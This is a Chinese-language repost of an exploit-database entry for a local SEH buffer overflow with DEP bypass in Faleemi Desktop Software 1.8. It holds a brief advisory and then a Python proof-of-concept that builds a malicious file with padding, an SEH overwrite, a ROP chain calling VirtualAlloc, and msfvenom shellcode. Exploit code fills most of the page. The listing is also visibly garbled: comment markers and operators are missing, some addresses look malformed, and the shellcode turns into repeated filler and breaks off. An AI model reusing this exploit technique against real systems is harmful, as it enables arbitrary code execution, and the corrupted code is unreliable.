Faleemi Desktop Software 1.8 本地缓冲区溢出漏洞 (SEH/DEP绕过) POC

Faleemi Desktop Software 1.8 - 本地缓冲区溢出 (SEH) (DEP 绕过) 漏洞概述 EDB-ID: 46269 发布日期: 2019-01-28 作者: BZYO 类型: 本地 (LOCAL) 平台: Windows 漏洞描述: Faleemi Desktop Software 1.8 存在本地缓冲区溢出漏洞，攻击者可通过构造恶意输入触发 SEH（结构化异常处理）覆盖，并绕过 DEP（数据执行保护）实现任意代码执行。 影响范围 受影响软件: Faleemi Desktop Software 1.8 操作系统: Windows 利用方式: 本地利用（需用户交互或本地执行） 修复方案 官方未提供明确补丁信息。 建议升级至最新版本或联系厂商获取安全更新。 临时缓解措施：禁用宏、限制文件执行权限、部署 EDR 防护。 POC / 利用代码 ```python #!/usr/bin/bin/python Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) Date: 01-26-19 Vulnerable Software: Faleemi Desktop Software 1.8 manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds practicing dep bypass by not using auto-generated mona.py ropchains original seh poc from Clonathan "John" Reale, EDB: 45402 badchars: \x00\x0a\x0d\x2f import struct filename = "faleemidep.txt" junk = "A" 264 #0x0004e7e ADD ESP,0B34 POP EBX POP EBP POP ESI POP EDI RETN seh = "\x7e\x04\x00\x00" fill = "C" 324 #VirtualAlloc() #EDI = ROP NOP (RETN) rop += struct.pack('<L', 0x60010221) POP EDI RETN rop += struct.pack('<L', 0x60010222) ROP-NOP #ECX = flProtect (0x40) rop += struct.pack('<L', 0x0004e7e1) POP ECX RETN rop += struct.pack('<L', 0xffffffff) MOV EAX,DWORD PTR [ESI+ECX] RETN for i in range(0,65): rop += struct.pack('<L', 0x6004bcc7) INC ECX RETN #ESI = ptr to VirtualAlloc() rop += struct.pack('<L', 0x6004aaca) POP EAX RETN rop += struct.pack('<L', 0x6004f0bc) ptr to VirtualAlloc() rop += struct.pack('<L', 0x60080b96) MOV EAX,DWORD PTR [ESI+ECX] RETN rop += struct.pack('<L', 0x73d03c02) XCHG EAX,ESI RETN #EDX = flAllocationType (0x1000) Math 1fffffffff - 0cc40360 = ff33b7c97 Math 2)ff33b7c97 + 10001 = ff33b8c98 rop += struct.pack('<L', 0x60832d5) MOV EDX,ECX40360 RETN rop += struct.pack('<L', 0x60036b0) POP EBX RETN rop += struct.pack('<L', 0xff33bc98) rop += struct.pack('<L', 0x6004e5ce) ADD EDX,EBX POP EDX RETN 0x10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 #EBP = ReturnTo (ptr to jmp esp) #mona jmp - esp -cpb "\x00\x0a\x0d\x2f" rop += struct.pack('<L', 0x600301e9) POP EBP RETN rop += struct.pack('<L', 0x73d04206) jmp esp #EBX = dwSize (0x1) rop += struct.pack('<L', 0x73d0febc) POP EBX RETN rop += struct.pack('<L', 0xffffffff) rop += struct.pack('<L', 0x73d0be1c) INC EDX XOR EAX,EAX RETN rop += struct.pack('<L', 0x73d0be1c) INC EBX XOR EAX,EAX RETN #EAX = NOP (0x90909090) rop += struct.pack('<L', 0x6004aaca) POP EAX RETN rop += struct.pack('<L', 0x90909090) NOPs. #PUSHAD rop += struct.pack('<L', 0x6004bd05) PUSHAD RETN nops = "\x90"*10 #msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python calc = "" calc += "\x8d\x91\xf7\xbd\x8d\x9c\xa2\xba\xfa\x34\x8d\x91\x74\x24\xfa\x4d\x3b\x29" calc += "\xc9\x91\xa1\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x4f\x7c\x81\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x9c\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x71\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x81\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Faleemi Desktop Software 1.8 本地缓冲区溢出漏洞 (SEH/DEP绕过) POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Faleemi Desktop Software 1.8 本地缓冲区溢出漏洞 (SEH/DEP绕过) POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！